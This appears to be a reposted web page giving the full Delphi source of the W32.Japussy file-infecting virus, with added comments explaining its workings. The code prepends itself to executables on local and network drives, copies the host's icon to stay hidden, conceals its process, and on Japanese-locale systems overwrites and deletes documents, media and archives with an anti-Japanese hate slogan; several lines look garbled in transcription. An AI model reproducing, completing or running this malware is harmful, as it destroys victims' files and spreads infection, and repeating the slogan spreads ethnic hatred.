Pandatv's core code

Source: Internet
Author: User
Tags high cpu usage

I have read it. It was written in Delphi; according to the notes it should be the D5SP1 version. I used D7SP1 to handle a few issues. The compilation was successful, but I didn't dare to try it, and I don't know who would want to. hey hey .. The code is as follows: program Japussy;
Uses
Windows, SysUtils, Classes, Graphics, ShellAPI {, Registry };
Const
// Layout constants of the prepender stub. InfectOneFile writes an infected file as
// [stub of HeaderSize bytes, with the host's icon patched in at IconOffset][original host][4-byte ID marker].
HeaderSize = 82432; // the size of the virus.
IconOffset = $12EB8; // offset of the primary graph of the PE File
// The size obtained by compiling on my Delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
HeaderSize = 38912; // the size of the virus body compressed by Upx
IconOffset = $ 92BC; // the offset of the Upx compressed over the main graph of the PE File
// Upx 1.24 W usage: upx-9 -- 8086 Japussy.exe
}
IconSize = $2E8; // the size of the master image of the PE file, which is 744 bytes.
IconTail = IconOffset + IconSize; // end of the Main chart of the PE File
// Detection: the last 4 bytes of an infected file equal this value (bytes 44 44 44 44, ASCII "DDDD");
// InfectOneFile reads the final 4 bytes and skips files that already carry it.
ID = $44444444; // infection mark
// LJ code for writing
// Overwrite pattern used by SmashFile; written repeatedly into data files before they are deleted.
Catchword = ''If a race need to be killed out, it must be Yamato.'' +
''If a country need to be destroyed, it must be Japan! ''+
''*** W32.Japussy. Worm. ***'';
{$ R *. RES}
// Imported from kernel32; the main block calls it on Win9x only. On that platform this API is
// known to remove the process from the Task List, i.e. a stealth indicator.
Function RegisterServiceProcess (dwProcessID, dwType: Integer): Integer;
StDCall; external ''kernel32. dll ''; // function declaration
Var
TmpFile: string; // path of the re-extracted host, built in the main block
Si: STARTUPINFO; // filled by FillStartupInfo before CreateProcess
Pi: PROCESS_INFORMATION; // receives the launched host's handles
IsJap: Boolean = False; // Japanese OS tag — set in InfectFiles (GetACP = 932), read in LoopFiles to enable SmashFile
{Judge whether it is Win9x}
// Returns True only when GetVersionEx reports VER_PLATFORM_WIN32_WINDOWS; False on an API
// failure or on the NT family. The main block uses it to decide whether to call RegisterServiceProcess.
Function IsWin9x: Boolean;
Var
Ver: TOSVersionInfo;
Begin
Result: = False;
Ver. dwOSVersionInfoSize: = SizeOf (TOSVersionInfo );
If not GetVersionEx (Ver) then
Exit; // unknown platform is treated as "not 9x"
If (Ver. dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
Result: = True;
End;
{Copying between streams}
// Copies Count bytes from Src at sStartPos to Dst at dStartPos, then restores both streams'
// original positions. Used by InfectOneFile to assemble the infected image piece by piece.
Procedure CopyStream (Src: TStream; sStartPos: Integer; Dst: TStream;
DStartPos: Integer; Count: Integer );
Var
SCurPos, dCurPos: Integer;
Begin
SCurPos: = Src. Position;
DCurPos: = Dst. Position;
Src. Seek (sStartPos, 0 );
Dst. Seek (dStartPos, 0 );
Dst. CopyFrom (Src, Count );
// Positions are put back so callers can interleave copies from several streams.
Src. Seek (sCurPos, 0 );
Dst. Seek (dCurPos, 0 );
End;
{Separating the host file from the infected PE file for use}
// Writes everything after the first HeaderSize bytes of the running image (ParamStr(0)) to FileName,
// i.e. recovers the original host program. Note the trailing 4-byte ID marker is not stripped, so the
// extracted copy still ends with it. Every exception is swallowed, so failure is silent.
Procedure ExtractFile (FileName: string );
Var
SStream, dStream: TFileStream;
Begin
Try
SStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
DStream: = TFileStream. Create (FileName, fmCreate );
Try
SStream. Seek (HeaderSize, 0); // skip the virus section of the header
DStream. CopyFrom (sStream, sStream. Size-HeaderSize );
Finally
DStream. Free;
End;
Finally
SStream. Free;
End;
Except
End;
End;
{Fill STARTUPINFO structure}
// Zeroes the optional STARTUPINFO fields and sets only the show-window state (State) via
// STARTF_USESHOWWINDOW. Called from the main block right before CreateProcess on the extracted host.
Procedure FillStartupInfo (var Si: STARTUPINFO; State: Word );
Begin
Si. cb: = SizeOf (Si );
Si. lpReserved: = nil;
Si. lpDesktop: = nil;
Si. lpTitle: = nil;
Si. dwFlags: = STARTF_USESHOWWINDOW;
Si. wShowWindow: = State;
Si. cbReserved2: = 0;
Si. lpReserved2: = nil;
End;
{Mail with virus}
// Empty stub: no mailing code exists in this listing. InfectFiles calls it once per sweep.
Procedure SendMail;
Begin
// Who is willing to do this?
End;
{Infected PE file}
// Prepender infection of one file. Silent bail-outs: own filename, no "PE" byte pair in the first
// $109 bytes, trailing ID marker already present, or size below 10240 bytes.
// Image written back over the host: [stub bytes 0..IconOffset) [host's main icon, IconSize bytes]
// [stub bytes IconTail..HeaderSize) [original host] [4-byte ID marker]. Patching the host's icon
// into the stub keeps the infected file looking like the original. All exceptions are swallowed.
Procedure InfectOneFile (FileName: string );
Var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
IID: LongInt;
AIcon: TIcon;
Infected, IsPE: Boolean;
I: Integer;
Buf: array [0 .. 1] of Char;
Begin
Try // if an error occurs, the file is in use and exits.
If CompareText (FileName, ''japussy. EXE '') = 0 then // do not infect yourself
Exit;
Infected: = False;
IsPE: = False;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
Try
// Crude PE test: any "PE" byte pair within the first $109 bytes counts; e_lfanew is not consulted.
For I: = 0 to $108 do // check the PE File Header
Begin
SrcStream. Seek (I, soFromBeginning );
SrcStream. Read (Buf, 2 );
If (Buf [0] = #80) and (Buf [1] = #69) then // PE tag
Begin
IsPE: = True; // It is a PE file.
Break;
End;
End;
SrcStream. Seek (-4, soFromEnd); // check the infection mark
SrcStream. Read (iID, 4 );
If (iID = ID) or (SrcStream. Size <10240) then // files that are too small are not infected
Infected: = True;
Finally
SrcStream. Free;
End;
If Infected or (not IsPE) then // exit if the file is Infected or not a PE File
Exit;
IcoStream: = TMemoryStream. Create;
DstStream: = TMemoryStream. Create;
Try
AIcon: = TIcon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
AIcon. ReleaseHandle;
AIcon. Handle: = ExtractIcon (HInstance, PChar (FileName), 0 );
AIcon. SaveToStream (IcoStream );
Finally
AIcon. Free;
End;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
// Header file
HdrStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
// Write data before the main icon of the virus.
CopyStream (HdrStream, 0, DstStream, 0, IconOffset );
// Write the main icon of the current program
// Skips the first 22 bytes of the saved icon stream — presumably the ICO file/directory header; verify.
CopyStream (IcoStream, 22, DstStream, IconOffset, IconSize );
// Write data between the main icon of the virus and the end of the virus.
CopyStream (HdrStream, IconTail, DstStream, IconTail, HeaderSize-IconTail );
// Write the Host Program
CopyStream (SrcStream, 0, DstStream, HeaderSize, SrcStream. Size );
// Write the infected mark
DstStream. Seek (0, 2 );
IID: = $44444444;
DstStream. Write (iID, 4 );
Finally
HdrStream. Free;
End;
Finally
SrcStream. Free;
IcoStream. Free;
// NOTE: this write-back sits in the Finally, so it also runs when an earlier step raised.
DstStream. SaveToFile (FileName); // Replace the host file
DstStream. Free;
End;
Except;
End;
End;
{Write the target file to the LJ code and delete it}
// Destructive payload, reached from LoopFiles only when IsJap is set. Clears all file attributes,
// overwrites Len bytes of Catchword at Max evenly spaced offsets (Max = Random(15) clamped up to 5,
// so 5..14 writes), then deletes the file. Errors are swallowed.
Procedure SmashFile (FileName: string );
Var
FileHandle: Integer;
I, Size, Mass, Max, Len: Integer;
Begin
Try
SetFileAttributes (PChar (FileName), 0); // remove the read-only attribute
FileHandle: = FileOpen (FileName, fmOpenWrite); // open the file
Try
Size: = GetFileSize (FileHandle, nil); // File Size
I: = 0;
Randomize;
Max: = Random (15); // Random number of times the LJ code is written
If Max <5 then
Max: = 5;
Mass: = Size div Max; // Size of each interval Block
Len: = Length (Catchword );
While I <Max do
Begin
FileSeek (FileHandle, I * Mass, 0); // locate
// Write the LJ code to completely destroy the file
FileWrite (FileHandle, Catchword, Len );
Inc (I );
End;
Finally
FileClose (FileHandle); // close the file
End;
DeleteFile (PChar (FileName); // delete it
Except
End;
End;
{Get writable drive list}
// Probes A..Z with GetDriveType and returns the letters reported as DRIVE_FIXED or DRIVE_REMOTE.
// Network drives are therefore in scope; removable and other drive types are not.
Function GetDrives: string;
Var
DiskType: Word;
D: Char;
Str: string;
I: Integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = Chr (I + 65 ); // 65 = 'A'
Str: = D + ':';
DiskType: = GetDriveType (PChar (Str ));
// Obtain the local disk and Network Disk
If (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
// Recursive directory walk. For each entry matching Mask: .EXE/.SCR -> InfectOneFile; the HTML/ASP,
// .wab, .ADC and Foxmail branches are empty stubs in this listing; any other extension from the
// data-file list -> SmashFile, but only when the global IsJap is set. After the files, every
// subdirectory is visited recursively. PeekMessage per entry and Sleep(200) throttle the loop.
Procedure LoopFiles (Path, Mask: string );
Var
I, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
// Classifies a search result: 0 = plain file, 1 = subdirectory (attr 16, not '.'/'..'), 2 = otherwise.
Function IsValidDir (SearchRec: TSearchRec): Integer;
Begin
// NOTE: the first condition appears mangled in this transcription; read it as the "not a directory" test.
If (SearchRec. Attr '.') and
(SearchRec. Name <> '..') then
Result: = 0 // not a directory
Else if (SearchRec. Attr = 16) and (SearchRec. Name <> '.') and
(SearchRec. Name <> '..') then
Result: = 1 // not the root directory
Else Result: = 2; // the root directory.
End;
Begin
If (FindFirst (Path + Mask, faAnyFile, SearchRec) = 0) then
Begin
Repeat
PeekMessage (Msg, 0, 0, 0, PM_REMOVE); // adjust the message queue to avoid suspicion.
If IsValidDir (SearchRec) = 0 then
Begin
Fn: = Path + SearchRec. Name;
Ext: = UpperCase (ExtractFileExt (Fn ));
If (Ext = '. EXE') or (Ext = '. SCR') then
Begin
InfectOneFile (Fn); // infect the executable file
End
Else if (Ext = '. htm') or (Ext ='. HTML ') or (Ext ='. ASP ') then
Begin
// Infect HTML and ASP files and write Base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
End
Else if Ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
End
Else if Ext = '. ADC' then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
End
Else if Ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
End
Else
Begin
If IsJap then // only on a Japanese-code-page OS (IsJap is set in InfectFiles)
Begin
If (Ext = '. DOC') or (Ext = '. XLS') or (Ext = '. MDB') or
(Ext = '. mp3') or (Ext ='. M') or (Ext = '. A') or
(Ext = '. wm') or (Ext ='. ZIP ') or (Ext ='. RAR ') or
(Ext = '. MPEG') or (Ext = '. asf') or (Ext ='. JPG ') or
(Ext = '. JPEG') or (Ext = '. GIF') or (Ext = '. SWF') or
(Ext = '. PDF') or (Ext = '. chm') or (Ext ='. avi') then
SmashFile (Fn); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
// Second pass: collect subdirectories, then recurse into each with the same Mask.
SubDir: = TStringList. Create;
If (FindFirst (Path + '*. *', faDirectory, SearchRec) = 0) then
Begin
Repeat
If IsValidDir (SearchRec) = 1 then
SubDir. Add (SearchRec. Name );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
Count: = SubDir. Count-1;
For I: = 0 to Count do
// NOTE: this call appears mangled in this transcription (no per-entry index is visible).
LoopFiles (Path + SubDir. Strings + '', Mask );
FreeAndNil (SubDir );
End;
{Traverse all files on the disk}
// Never returns. GetACP = 932 (the Japanese ANSI code page) arms the destructive SmashFile branch via
// the global IsJap; then every fixed/remote drive from GetDrives is walked with LoopFiles, SendMail
// (a stub) is called, and the process sleeps 5 minutes before sweeping again.
Procedure InfectFiles;
Var
DriverList: string;
I, Len: Integer;
Begin
If GetACP = 932 then // Japanese Operating System
IsJap: = True; // Let's die!
DriverList: = GetDrives; // obtain the writable disk list.
Len: = Length (DriverList );
While True do // Infinite Loop
Begin
// NOTE: the loop index I is not used in the call as printed; the per-drive selection appears mangled in this transcription.
For I: = Len downto 1 do // traverse each disk drive
LoopFiles (DriverList + ':', '*. *'); // infected
SendMail; // send a mail with a virus
Sleep (1000*60*5); // Sleep for 5 minutes
End;
End;
{Main program start}
// Entry point. On Win9x the process registers itself as a service process (stealth); the NT branch is
// an empty stub. If the image runs under its own name 'Japussy.exe' it goes straight to InfectFiles.
// Otherwise it is running as a stub prepended to a host: it derives a sibling path by dropping 4
// characters and appending ' .exe' (a space before the extension), writes the original host there with
// ExtractFile, launches it — presumably so the user sees the expected program — and then runs
// InfectFiles in this process (never returns). Indicator: a second executable next to the infected
// one whose name ends in ' .exe'.
Begin
If IsWin9x then // is Win9x
RegisterServiceProcess (GetCurrentProcessID, 1) // register as a service process
Else // WinNT
Begin
// Remote thread ing to Explorer process
// Which station is willing to complete?
End;
// If it is the original virus
If CompareText (ExtractFileName (ParamStr (0), 'Japussy.exe ') = 0 then
InfectFiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
TmpFile: = ParamStr (0); // create a temporary file
Delete (TmpFile, Length (TmpFile)-4, 4 ); // intent per the author's comments: strip the '.exe' extension
TmpFile: = TmpFile + #32 + '.exe '; // real host file with one more space
ExtractFile (TmpFile); // separated
FillStartupInfo (Si, SW_SHOWDEFAULT );
// bInheritHandles = True; the launched host inherits this process's handles.
CreateProcess (PChar (TmpFile), PChar (TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); // create a new process to run
InfectFiles; // infect and send emails
End;
End.
